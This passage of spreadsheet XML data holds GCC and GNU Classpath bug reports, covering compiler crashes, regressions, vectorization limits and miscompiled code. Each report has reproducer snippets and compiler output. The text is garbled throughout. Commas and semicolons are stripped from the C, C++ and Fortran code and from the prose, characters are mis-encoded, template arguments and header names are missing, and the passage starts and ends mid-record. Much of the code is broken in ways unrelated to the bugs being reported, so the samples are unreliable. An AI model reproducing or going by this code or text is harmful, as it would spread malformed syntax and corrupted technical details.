3.0.1
Environment:
System: Linux jaguar 2.4.10 #1 Mon Sep 24 16:48:49 MSD 2001 i686 unknown
Architecture: i686
host: i386-redhat-linux-gnu
build: i386-redhat-linux-gnu
target: i386-redhat-linux-gnu
configured with: ../gcc-3.0.1/configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-languages=c++f77java --enable-threads=posix --with-system-zlib i386-redhat-linux
Also reproduced with gcc-3.0.1 on sparc-sun-solaris2.7
How-To-Repeat:
class foo {
public:
  class bar {
  public:
    int z
  }
  void y()
}
void foo::y()
{
  int i = sizeof(foo::bar::z)
}
void y()
{
  int i = sizeof(foo::bar::z)
}
Unformatted:
 &gt;&gt;&gt; g++ -c foo.cc 
 foo.cc: In member function `void foo::y()':
 foo.cc:12: cannot convert a pointer of type `foo' to a pointer of type 
    `foo::bar'
 foo.cc: In function `void y()':
 foo.cc:5: member `foo::bar::z' is non-static but referenced as a static member
 foo.cc:16: at this point in file</t>
  </si>
  <si>
    <t>roman.kagan</t>
  </si>
  <si>
    <t>GCC-52149</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/vect/vect-8.f90</t>
  </si>
  <si>
    <t>This new test fails on arm-none-eabi target. The test was added to trunk in r183917 as described in PR32373.</t>
  </si>
  <si>
    <t>Greta.Yorsh</t>
  </si>
  <si>
    <t>GCC-50596</t>
  </si>
  <si>
    <t>Problems in vectorization of condition expression</t>
  </si>
  <si>
    <t>I've the need to vectorize something like this
const int N=1024
float a[1024]
float b[1024]
float c[1024]
float d[1024]
bool z[1024]
// not vectorized: control flow in loop
void ori() {
  for (int i=0 i!=N ++i)
    z[i] = a[i]&lt;b[i] 
}
The only equivalent function that vectorize is
float r[1024]
void bar() {
  for (int i=0 i!=N ++i)
    r[i] = (a[i]&lt;b[i] ? 1.f : 0.f) *  ( c[i]&lt;d[i] ? 1.f : 0.f)
}
(not exactly a highly optimized versionâ€¦)
All other variants below do not vectorize for the reason in the comment that precede each
// not vectorized: no vectype for stmt: z[i_17] = D.2199_10
// scalar_type: bool
void ori2() {
  for (int i=0 i!=N ++i)
    z[i] = a[i]&lt;b[i] 
}
// not vectorized: control flow in loop.
int j[1024]
void foo1() {
  for (int i=0 i!=N ++i)
    j[i] = a[i]&lt;b[i] 
}
// not vectorized: unsupported data-type bool
void foo2() {
  for (int i=0 i!=N ++i)
    j[i] = int(a[i]&lt;b[i]) 
}
// not vectorized: unsupported data-type bool
void foo3() {
  for (int i=0 i!=N ++i)
    j[i] = int(a[i]&lt;b[i])
}
// not vectorized: unsupported data-type bool
void foo4() {
  for (int i=0 i!=N ++i)
    j[i] = a[i]&lt;b[i] ? 1L : 0L 
}
any chance to make at least foo2 or equivalent vectorized?</t>
  </si>
  <si>
    <t>GCC-58700</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE declaring static bit-field</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.8.0:
=====================
struct A
{
  static int : 4
}
=====================
bug.cc:3:16: internal compiler error: Segmentation fault
   static int : 4
                ^
0xb15dff crash_signal
        ../../gcc/gcc/toplev.c:335
0x5831a7 grokdeclarator(cp_declarator const* cp_decl_specifier_seq* decl_context int tree_node**)
        ../../gcc/gcc/cp/decl.c:10642
0x617fcd grokbitfield(cp_declarator const* cp_decl_specifier_seq* tree_node* tree_node*)
        ../../gcc/gcc/cp/decl2.c:1043
0x660ba6 cp_parser_member_declaration
        ../../gcc/gcc/cp/parser.c:20031
0x6402c7 cp_parser_member_specification_opt
        ../../gcc/gcc/cp/parser.c:19726
0x6402c7 cp_parser_class_specifier_1
        ../../gcc/gcc/cp/parser.c:18970
0x6402c7 cp_parser_class_specifier
        ../../gcc/gcc/cp/parser.c:19197
0x6402c7 cp_parser_type_specifier
        ../../gcc/gcc/cp/parser.c:14144
0x65924f cp_parser_decl_specifier_seq
        ../../gcc/gcc/cp/parser.c:11389
0x65fd89 cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:10979
0x643860 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10928
0x66aaae cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10825
0x6697ca cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10711
0x66b0e6 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3989
0x66b0e6 c_parse_file()
        ../../gcc/gcc/cp/parser.c:30962
0x787f73 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1046
Please submit a full bug report [etc.]
GCC 4.7.x issued a suitable error message instead:
bug.cc:3:16: error: static member '' cannot be a bit-field</t>
  </si>
  <si>
    <t>GCC-53389</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] -frealloc-lhs: memory leak when assigning array function result to allocatable array where one of its supplied arguments is itself an array function result</t>
  </si>
  <si>
    <t>The following test code leaks memory rapidly - reproduced on Ubuntu's gfortran 4.6.3 with gfortran 4.7.1 and with a nightly build of 4.8 trunk revision 187620 - default optimisation flags (none specified). As far as I've narrowed it down it seems to occur when an array function result is assigned to an allocatable array where one of the arguments supplied to this function is itself an array function result. In the example below the outer function and the function supplied as an argument are the same and the returned array is an automatic array but that does not seems to be necessary to reproduce the problem.
module foo
  implicit none
  contains
  function filler(array val)
    real dimension(:) intent(in):: array
    real dimension(size(array)):: filler
    real intent(in):: val
    filler=val
  end function filler
end module
program test
  use foo
  implicit none
  real dimension(:) allocatable:: x y
  integer parameter:: N=1000*1000
  integer:: i
  allocate( x(N) y(N) )
  y=0.0
  do i=1 N
    print *i
    x=filler(filler(y real(2*i)) real(i))
    y=y+x
  end do
end program test</t>
  </si>
  <si>
    <t>stephan.kramer</t>
  </si>
  <si>
    <t>GCC-7897</t>
  </si>
  <si>
    <t>gcc3.2 fails building kdeaddons when using the -march=pentium4 flag</t>
  </si>
  <si>
    <t>kdeaddons/noatun-plugins/tyler/compute.c failes to build using the -march=pentium4 flag
i686-pc-linux-gnu-gcc -DHAVE_CONFIG_H -I. -I. _I../.. -I/usr/kde/3/include
-I/usr/qt/3/include -I/usr/X11R6/include -I/usr/nclude/SDL -D_REENTRANT
-DQT_THREAD_SUPPORT -D_REENTRANT -DNDEBUG -O2 -march=pentium4 -O3 -pipe -c `test -f compute.c
!! echo ' ./' `compute.c
compute.c: In function `generate_sector':
compute.c:175: unable to find a register to spill in class 'FLOAT_REGS'
compute.c:175: this is the insn:
(insn 187 184 189 (set (reg:DF 9 st(1) [117])
		(float_extend:DF (subreg:SF (reg/v:DI rxmm0 [82]) 0))) 133
{*extendsfdf2_1} (nil)
	(nil))
compute.c:175: confused by earlier errors bailing out
make: *** [compute.o] Error 1
I have had this confirmed by one other person (sorry hes the only other person I know with a p4) same result also have tried with the -O2 flag instead of the -O3 flag
Release:
3.2
Environment:
Configured with: /var/tmp/portage/gcc-3.2-r1/work/gcc-3.2/configure
--prefix=/usr --mandir=/usr/share/man -infodir=/usr/share/info --enable-shared
--host=i686-pc-linux-gnu --build=i686-pc-linux-gnu --target=i686-pc-gnu
--with-system-zlib -enable-languages=cc++adaf77abjcjava
--enable-threads=posix --enable-long-long --disable-checking
--enable-cstdio=stdio --enable-clocale=generic --enable-__cxa_atexit
--enable-version-specific-runtime-libs
--withgxx-include-dir=/ust/include/g++-v32 --with-local-prefix=/usr/local
--enable-shared --enable0nls --without-included-gettext
Thread model: posix
gcc version 3.2
CFLAGS=-march=pentium4 -O3 -pipe
CXXFLAGS=-march=pentium4 -O3 -pipe
Info from /proc/cpuinfo
cpu family	:15
model		:2
model name	:Intel(R) Pentium(R) 4 Mobile CPU 1.60Ghz
stepping	:4
How-To-Repeat:
Build kdeaddons on a P4 with -march=pentium4</t>
  </si>
  <si>
    <t>mhillary</t>
  </si>
  <si>
    <t>GCC-21264</t>
  </si>
  <si>
    <t>duplicate symbol warnings for complex template class</t>
  </si>
  <si>
    <t>/// template.cc /////////////////////////////////////////
struct VirtualBase
{
    virtual ~VirtualBase()
}
struct Foo
{}
struct Bar
{
    virtual ~Bar()
}
template
class Test : public VirtualBase public OtherBase
{
}
void func()
{
  Test foo
  Test bar
}
//////////////////////////////////////////
$ /tools/pkg/gcc/3.4.3/bin/g++ -shared -Wl-G -o lib343.so template.cc
$ dump -Tv lib343.so | c++filt
IMEX Sclass   Type           IMPid Name
 EXP     DS   Ldef        [noIMid] Test::~Test()
 EXP     DS   Ldef        [noIMid] Test::~Test()
wEXP     DS SECdef        [noIMid] non-virtual thunk to Test::~Test()
wEXP     DS SECdef        [noIMid] non-virtual thunk to Test::~Test()
wEXP     DS SECdef        [noIMid] Test::~Test()
wEXP     DS SECdef        [noIMid] Test::~Test()
$ /tools/pkg/gcc/3.3.3/bin/g++ -shared -Wl-G -o lib333.so template.cc
$ dump -Tv lib333.so | c++filt
IMEX Sclass   Type           IMPid Name
wEXP     DS SECdef        [noIMid] Test::~Test()
wEXP     DS SECdef        [noIMid] Test::~Test()
wEXP     DS SECdef        [noIMid] non-virtual thunk to Test::~Test()
wEXP     DS SECdef        [noIMid] non-virtual thunk to Test::~Test()
wEXP     DS SECdef        [noIMid] Test::~Test()
wEXP     DS SECdef        [noIMid] Test::~Test()
Note that I edited the dump output to reduce its size.
Here you can see that the Test::~Test() destructor gets a different IMEX. 
Depending on its template parameter and/or compiler version.
I dont know exactly what the difference between EXP and wEXP is but I suspect 
that this has something to do with weak symbols. But on the other hand I 
always read that AIX supports no weak symbols.
Nevertheless when using the class Test in different shared libraries 
which get linked together you get warnings about duplicate symbols. This 
warnings were not present with GCC 3.3.3.
I am very nervous when seeing duplicate symbols. Especially on AIX. I had great 
times in the past analysing problems with uncaught exceptions that were caused 
by duplicate symbols.</t>
  </si>
  <si>
    <t>GCC-2652</t>
  </si>
  <si>
    <t>Internal compiler error in `emit_move_insn' at expr.c:2594</t>
  </si>
  <si>
    <t>Compilation of the attached file causes an internal error
in the compiler.  The code is nonsense but it shouldn't
cause an internal error.
Release:
GNU C++ version 2.95.3 20010315 (release) (i686-pc-linux-gnu) compiled by GNU C version 2.95.3 20010315 (release).
Environment:
RedHat Linux 6.1 i386
How-To-Repeat:
g++ -c foo.C</t>
  </si>
  <si>
    <t>mbh</t>
  </si>
  <si>
    <t>GCC-28744</t>
  </si>
  <si>
    <t>externally_visible attribute not effective with prior declaration of symbol.</t>
  </si>
  <si>
    <t>$ cat foo.c
extern char *bar1 __attribute__((externally_visible))
char *bar1
extern char *bar2 __attribute__((externally_visible))
char *bar2 __attribute__((externally_visible))
extern char *bar3
char *bar3 __attribute__((externally_visible))
char *bar4 __attribute__((externally_visible))
char *bar5
extern char *bar5 __attribute__((externally_visible))
 $ gcc -O -fwhole-program -c -o foo.o foo.c
foo.c:1: warning: â€˜externally_visibleâ€™ attribute have effect only on public objects
foo.c:4: warning: â€˜externally_visibleâ€™ attribute have effect only on public objects
foo.c:13: warning: â€˜externally_visibleâ€™ attribute have effect only on public objects
 $ nm -a foo.o | grep bar
00000004 C bar4
All five of these variables ought to be externally visible.
Note -fwhole-program.
Seen with:
(ppc) gcc version 4.1.1 20060525 (Red Hat 4.1.1-1.pr27898)
(ppc-&gt;i686) gcc version 4.1.0</t>
  </si>
  <si>
    <t>GCC-72813</t>
  </si>
  <si>
    <t>[6 Regression] atomic header cannot be compiled into translation unit with -fkeep-inline-functions</t>
  </si>
  <si>
    <t>$ echo '#include ' &gt; foo.h
$ gcc-6 -std=c++11 -fdump-translation-unit -fkeep-inline-functions -c -x c++-header -fpermissive -w -fPIC foo.h
In file included from /usr/include/c++/6/atomic:41:0
                 from foo.h:1:
/usr/include/c++/6/bits/atomic_base.h: In member function 'std::atomic::operator bool() const':
/usr/include/c++/6/bits/atomic_base.h:390:7: error: inlining failed in call to always_inline 'std::__atomic_base::__int_type std::__atomic_base::load(std::memory_order) const noexcept [with _ITp = bool std::__atomic_base::__int_type = bool std::memory_order = std::memory_order]': function body not available
       load(memory_order __m = memory_order_seq_cst) const noexcept
       ^~~~
In file included from foo.h:1:0:
/usr/include/c++/6/atomic:81:27: note: called from here
     { return _M_base.load() }
                           ^
$ gcc-5 -std=c++11 -fdump-translation-unit -fkeep-inline-functions -c -x c++-header -fpermissive -w -fPIC foo.h</t>
  </si>
  <si>
    <t>GCC-992</t>
  </si>
  <si>
    <t>i386 cc1 crashes if passed '-msse'</t>
  </si>
  <si>
    <t xml:space="preserve">	cc1 crashes in build_function_type (called from ix86_init_builtins)
	if '-msse' is passed on the command line. A null pointer (value_type)
       	is dereferenced.
Release:
2.97 20001205 (experimental)
Environment:
System: Linux stag.telekinesys 2.2.17sk #14 Thu Nov 30 20:11:50 GMT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --with-gnu-as --with-gnu-ld --enable-languages=c
How-To-Repeat:
	Simply run 'cc1 -msse'. It does not even begin parsing input.
	Backtrace is 
#0  build_function_type (value_type=0x0 arg_types=0x401858e0) at ../../gcc/gcc/tree.c:3869
#1  0x82ae0a5 in ix86_init_builtins () at ../../gcc/gcc/config/i386/i386.c:7414
#2  0x8058697 in init_decl_processing () at ../../gcc/gcc/c-decl.c:3058
#3  0x8094188 in compile_file (name=0x82d92ae stdin) at ../../gcc/gcc/toplev.c:2180
#4  0x8098140 in main (argc=2 argv=0xbffff974) at ../../gcc/gcc/toplev.c:4848
#5  0x4003ce51 in __libc_start_main (main=0x8097ca0  argc=2 ubp_av=0xbffff974 init=0x80491a0  fini=0x82d1b5c  rtld_fini=0x4000e264  stack_end=0xbffff96c) at ../sysdeps/generic/libc-start.c:111</t>
  </si>
  <si>
    <t>stephen.kennedy</t>
  </si>
  <si>
    <t>GCC-12286</t>
  </si>
  <si>
    <t>friend declaration in a template class using a specialized template for the friend isn't recognised.</t>
  </si>
  <si>
    <t>See transcript following: 
conwaypc::~&gt; cat x.cc 
class Foo 
{ 
public: 
} 
template  class Vector 
template  
class UseRef 
{ 
public: 
private: 
    //friend class Vector &gt; 
    friend class Vector &gt; 
    void bar() {} 
} 
template  
class Vector 
{ 
public: 
    void foo() 
    { 
        u.bar() 
    } 
    T u 
    Vector() 
    { 
        foo() 
    } 
} 
Vector &gt; x 
conwaypc::~&gt; gcc -c x.cc 
x.cc: In member function `void Vector::foo() [with T = UseRef]': 
x.cc:33:   instantiated from `Vector::Vector() [with T = UseRef]' 
x.cc:37:   instantiated from here 
x.cc:17: `void UseRef::bar() [with T = Foo]' is private 
x.cc:26: within this context 
conwaypc::~&gt; gcc --version 
gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5) 
Copyright (C) 2002 Free Software Foundation Inc. 
This is free software see the source for copying conditions.  There is NO 
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. 
conwaypc::~&gt; uname -a 
Linux conwaypc 2.4.20-18.1.caps #1 Wed Jun 4 17:41:45 PDT 2003 i686 i686 i386 
GNU/Linux</t>
  </si>
  <si>
    <t>conway</t>
  </si>
  <si>
    <t>GCC-20365</t>
  </si>
  <si>
    <t>simplify_plus_minus results are erratic</t>
  </si>
  <si>
    <t>simplify_plus_minus uses an unstabilized qsort call.  This makes
the perfomed optimizations dependent on the qsort implementation.
The observed problem was that a mingw hosted compiler generated
different code than a Linux/GNU hosted compiler.
A patch is here:
http://gcc.gnu.org/ml/gcc-cvs/2004-06/msg00665.html</t>
  </si>
  <si>
    <t>GCC-45732</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in bit_value_unop at tree-ssa-ccp.c:1861 at -O1</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -O testcase.c 
testcase.c: In function 'foo':
testcase.c:8:1: internal compiler error: in bit_value_unop at tree-ssa-ccp.c:1861
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r164287 - crash
r163636 - crash
r161659 - OK</t>
  </si>
  <si>
    <t>GCC-57864</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in bitmap_set_replace_value at tree-ssa-pre.c:862</t>
  </si>
  <si>
    <t>Created attachment 30482
Reduced testcase crashes 4.7.3 when compiled with -O3 -m64
The attached reduced testcase produces an ICE on 4.7.3 when compiled with -O3. -O2 is fine as is 4.7.2 and 4.8.0. Compilation with -m32 likewise passes.
$ /opt/gccs/4.7.3/bin/g++--4.7.3 -c -O3 -m64 testcase.cpp 
testcase.cpp: In function â€˜void _ZL3fn1P1Xib.constprop.0(X* bool)â€™:
testcase.cpp:18:1: internal compiler error: in bitmap_set_replace_value at tree-ssa-pre.c:862
This seems to be related to bug 55888 and bug 55107.
Full details:
$ /opt/gccs/4.7.3/bin/g++--4.7.3 -v -c -O3 -m64 testcase.cpp 
Using built-in specs.
COLLECT_GCC=/opt/gccs/4.7.3/bin/g++--4.7.3
Target: x86_64-unknown-linux-gnu
Configured with: ../src/gcc-4.7.3/configure --prefix=/opt/gccs/4.7.3 --program-suffix=--4.7.3 --enable-languages=cc++ --disable-bootstrap
Thread model: posix
gcc version 4.7.3 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-c' '-O3' '-m64' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /opt/gccs/4.7.3/libexec/gcc/x86_64-unknown-linux-gnu/4.7.3/cc1plus -quiet -v -D_GNU_SOURCE testcase.cpp -quiet -dumpbase testcase.cpp -m64 -mtune=generic -march=x86-64 -auxbase testcase -O3 -version -o /tmp/ccm58ig9.s
GNU C++ (GCC) version 4.7.3 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.4.5 GMP version 4.3.2 MPFR version 3.0.0-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /opt/gccs/4.7.3/lib/gcc/x86_64-unknown-linux-gnu/4.7.3/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /opt/gccs/4.7.3/lib/gcc/x86_64-unknown-linux-gnu/4.7.3/../../../../include/c++/4.7.3
 /opt/gccs/4.7.3/lib/gcc/x86_64-unknown-linux-gnu/4.7.3/../../../../include/c++/4.7.3/x86_64-unknown-linux-gnu
 /opt/gccs/4.7.3/lib/gcc/x86_64-unknown-linux-gnu/4.7.3/../../../../include/c++/4.7.3/backward
 /opt/gccs/4.7.3/lib/gcc/x86_64-unknown-linux-gnu/4.7.3/include
 /opt/gccs/4.7.3/include
 /opt/gccs/4.7.3/lib/gcc/x86_64-unknown-linux-gnu/4.7.3/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.7.3 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.4.5 GMP version 4.3.2 MPFR version 3.0.0-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 4073671a6c09c56d7812f3b7ae137fde
testcase.cpp: In function â€˜void _ZL3fn1P1Xib.constprop.0(X* bool)â€™:
testcase.cpp:18:1: internal compiler error: in bitmap_set_replace_value at tree-ssa-pre.c:862
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>j-1fabfe3bb3efc0eaf9750936b80a1c20</t>
  </si>
  <si>
    <t>CLASSPATH-24229</t>
  </si>
  <si>
    <t>JTextField and JTextArea problems</t>
  </si>
  <si>
    <t>Recent changes broke the Swing text components... (unfortunately some of
those changes were probably motivated by my previous bug reports. Sorry.)
Run the attached testcase which just displays one JTextField and one JTextArea
without further decoration inside a JFrame.
(1) Type into the textfield to see that the textfield is not updated.
    It seems that the keystrokes are recorded because the textfield is
    updated when you exit and re-enter the component with the mouse.
    (Note: iirc the textfield update was already broken before yesterdays
     caret-blinking patch)
(2) Randomly type into the textarea also sometimes triggers the following 
    exception:
java.lang.NullPointerException
   at java.lang.String. (String.java:515)
   at java.lang.String. (String.java:241)
   at gnu.java.awt.peer.gtk.GdkFontMetrics.charsWidth (GdkFontMetrics.java:110)
   at javax.swing.text.PlainView.insertOrRemoveUpdate (PlainView.java:352)
   at javax.swing.text.PlainView.insertUpdate (PlainView.java:376)
   ...</t>
  </si>
  <si>
    <t>GCC-52196</t>
  </si>
  <si>
    <t>Add -Wrealloc-lhs</t>
  </si>
  <si>
    <t>While (re)allocation of the LHS with intrinsic assignment is a great feature for hot loops it can cause in some cases a severe slow down. Analyzing a program to find the places where reallocation happens can be rather difficult. Thus it would be useful if the compiler could assist by providing the following warnings:
(Suggested wording should be refined.)
-Wrealloc-lhs
Warn when the compiler inserts code to for allocation or reallocation of an allocatable array variable of intrinsic type in intrinsic assignments. In hot loops the Fortran 2003 reallocation feature may reduce the performance. If the array is already allocated with the correct shape consider using a whole-array array-spec (e.g. (:::)) for the variable on the left-hand side to prevent the reallocation check. See also -frealloc-lhs.
-Wrealloc-lhs-all
Warn when the compiler inserts code to for allocation or reallocation of an allocatable variable this includes scalars and derived types.
The reason I suggest two flags:
The first one is probably the more useful one: intrinsic variables are typically used in hot loops for arrays the effect is more severe and in many program - even those which use reallocate on assignment - the array realloc-on-assignment for an intrinsic type is rarely used. Additionally by adding an array section which encompasses the whole array reallocation can be prevented without causing further problems.
By contrast for scalars intrinsic types are typically either not allocatable or - as with deferred-length characters - the reallocation is usually intended and not used in hot loops. Similarly for derived types: Assignments are typically not done in hot loops otherwise they are either simple scalars (which shouldn't be allocatables) or not used in hot loops. If they have allocatable components the reallocation is already heavy.
Thus in many cases -Wrealloc-lhs will show potential hotspots without too many false positives while the extra warnings of -Wrealloc-lhs-all might be sometimes helpful but should also contain many false positives.</t>
  </si>
  <si>
    <t>GCC-51796</t>
  </si>
  <si>
    <t>[4.7 regression] internal compiler error: in distribute_notes at combine.c:13285 for libgomp/alloc.c on m68k-linux</t>
  </si>
  <si>
    <t>Created attachment 26276
preprocessed source for libgomp/alloc.c
Bootstrapping gcc-4.7-20120107 on m68k-linux fails during all-stage1-target-libgomp with:
/mnt/scratch/objdir47/./gcc/xgcc -B/mnt/scratch/objdir47/./gcc/ -B/mnt/scratch/install47/m68k-unknown-linux-gnu/bin/ -B/mnt/scratch/install47/m68k-unknown-linux-gnu/lib/ -isystem /mnt/scratch/install47/m68k-unknown-linux-gnu/include -isystem /mnt/scratch/install47/m68k-unknown-linux-gnu/sys-include -DHAVE_CONFIG_H -I. -I/mnt/scratch/gcc-4.7-20120107/libgomp -I/mnt/scratch/gcc-4.7-20120107/libgomp/config/posix -I/mnt/scratch/gcc-4.7-20120107/libgomp -Wall -Werror -pthread -ftls-model=initial-exec -g -O2 -MT alloc.lo -MD -MP -MF .deps/alloc.Tpo -c /mnt/scratch/gcc-4.7-20120107/libgomp/alloc.c -o alloc.o
/mnt/scratch/gcc-4.7-20120107/libgomp/alloc.c: In function 'gomp_malloc':
/mnt/scratch/gcc-4.7-20120107/libgomp/alloc.c:40:1: internal compiler error: in distribute_notes at combine.c:13285
The previous weekly snapshot gcc-4.7-20111231 built fine (once r182819 was backported to fix PR51725)</t>
  </si>
  <si>
    <t>GCC-65039</t>
  </si>
  <si>
    <t>[5 Regression] g++ 5 segmentation fault when compiling with -O2 optimization</t>
  </si>
  <si>
    <t>Created attachment 34739
preprocessed c++ source that triggers g++ segmentation fault when compiling with -O2
# g++5 -v
Using built-in specs.
COLLECT_GCC=g++5
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc5/gcc/x86_64-portbld-freebsd10.1/5.0.0/lto-wrapper
Target: x86_64-portbld-freebsd10.1
Configured with: ./../gcc-5-20150208/configure --with-build-config=bootstrap-debug --disable-nls --enable-gnu-indirect-function --libdir=/usr/local/lib/gcc5 --libexecdir=/usr/local/libexec/gcc5 --program-suffix=5 --with-as=/usr/local/bin/as --with-gmp=/usr/local --with-gxx-include-dir=/usr/local/lib/gcc5/include/c++/ --with-ld=/usr/local/bin/ld --with-pkgversion='FreeBSD Ports Collection' --with-system-zlib --with-ecj-jar=/usr/local/share/java/ecj-4.5.jar --enable-languages=cc++objcfortranjava --prefix=/usr/local --mandir=/usr/local/man --infodir=/usr/local/info/gcc5 --build=x86_64-portbld-freebsd10.1
Thread model: posix
gcc version 5.0.0 20150208 (experimental) (FreeBSD Ports Collection) 
g++ is getting a segmentation fault when compiling a particular c++ file with -O2 optimization.  Compiling with -O0 or -O1 is successful.
Fails:
# g++5 -std=c++11 -fmessage-length=0 -c -O2 -fno-strict-aliasing -fvisibility=hidden -fvisibility-inlines-hidden -g1 -Wall -Wextra -Wendif-labels -Wshadow -Wno-ctor-dtor-privacy     -Wno-non-virtual-dtor  -Wno-unused-local-typedefs -fpic -fexceptions -fno-enforce-eh-specs -o _serviceregistration_controller.o _serviceregistration_controller.ii 
/wrkdirs/usr/ports/editors/openoffice-4/work/aoo-4.1.1/main/chart2/source/controller/main/_serviceregistration_controller.cxx:113:1: internal compiler error: Segmentation fault
 }
 ^
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
Succeeds:
# g++5 -std=c++11 -fmessage-length=0 -c -O1 -fno-strict-aliasing -fvisibility=hidden -fvisibility-inlines-hidden -g1 -Wall -Wextra -Wendif-labels -Wshadow -Wno-ctor-dtor-privacy     -Wno-non-virtual-dtor  -Wno-unused-local-typedefs -fpic -fexceptions -fno-enforce-eh-specs -o _serviceregistration_controller.o _serviceregistration_controller.ii
#</t>
  </si>
  <si>
    <t>truckman</t>
  </si>
  <si>
    <t>GCC-12372</t>
  </si>
  <si>
    <t>[3.4 regression] miscompilation of execute/20030307-1.c at -O2 and -Os</t>
  </si>
  <si>
    <t>The function vfswrap_lock is miscompiled.  This is the assembler output
generated by 3.4 20030922 at -O2:
vfswrap_lock:
        .PROC
        .CALLINFO FRAME=64CALLSSAVE_RP
        .ENTRY
        stw %r2-20(%r30)
        copy %r25%r26
        ldo 64(%r30)%r30
        ldw -84(%r30)%r2
        copy %r24%r25
        ldw -120(%r30)%r23
        ldw -116(%r30)%r24
        bl fcntl_lock%r0
        ldo -64(%r30)%r30
        nop
        .EXIT
        .PROCEND
The copy of the 5th argument on the stack has been lost. 
This is the code generated by 3.3.1:
vfswrap_lock:
        .PROC
        .CALLINFO FRAME=64CALLSSAVE_RP
        .ENTRY
        stw %r2-20(%r30)
        ldo 64(%r30)%r30
        ldw -84(%r30)%r2
        ldw -128(%r30)%r19
        ldw -124(%r30)%r20
        copy %r24%r21
        copy %r25%r26
        ldw -120(%r30)%r23
        ldw -116(%r30)%r24
        copy %r21%r25
        stw %r19-120(%r30)
        stw %r20-116(%r30)
        ldw -132(%r30)%r19
        stw %r19-124(%r30)
        bl fcntl_lock%r0
        ldo -64(%r30)%r30
        nop
        .EXIT
        .PROCEND
This code executes correctly.</t>
  </si>
  <si>
    <t>GCC-5681</t>
  </si>
  <si>
    <t>gcc 3.0.3 produces wrong assembler code</t>
  </si>
  <si>
    <t xml:space="preserve">	The compiler generates wrong assembler code in non-optimized mode
	but works correctly in optimized mode (-O1 -O2 or -O3).
Release:
3.0.3
Environment:
System: Linux archer.pst.qub.ac.uk 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/usr/local/gcc3
How-To-Repeat:
archer.pst.qub.ac.uk&gt; gcc -v -save-temps -ansi -g rtoptdepthinit.c
Reading specs from /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.3/specs
Configured with: ../gcc-3.0.3/configure --prefix=/usr/local/gcc3
Thread model: single
gcc version 3.0.3
 /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.3/cpp0 -lang-c -std=c89 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=3 -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ rtoptdepthinit.c rtoptdepthinit.i
GNU CPP version 3.0.3 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/gcc3/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.3/include
 /usr/include
End of search list.
 /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.3/cc1 -fpreprocessed rtoptdepthinit.i -quiet -dumpbase rtoptdepthinit.c -ansi -g -ansi -version -o rtoptdepthinit.s
GNU CPP version 3.0.3 (cpplib) (i386 Linux/ELF)
GNU C version 3.0.3 (i686-pc-linux-gnu)
        compiled by GNU C version 3.0.3.
 as --traditional-format -V -Qy -o rtoptdepthinit.o rtoptdepthinit.s
GNU assembler version 2.10.91 (i386-redhat-linux) using BFD version 2.10.91.0.2
 /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.3/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.3/crtbegin.o -L/usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.3 -L/usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.3/../../.. rtoptdepthinit.o -lgcc -lc -lgcc /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.3/crtend.o /usr/lib/crtn.o
archer.pst.qub.ac.uk&gt; a.out
2241 3383
3383 3383
a.out: rtoptdepthinit.c:19: RTOptDepthInit: Assertion `StopCalc.iptnu &lt; rfield.nupper-1' failed.
Abort
The correct output would have been:
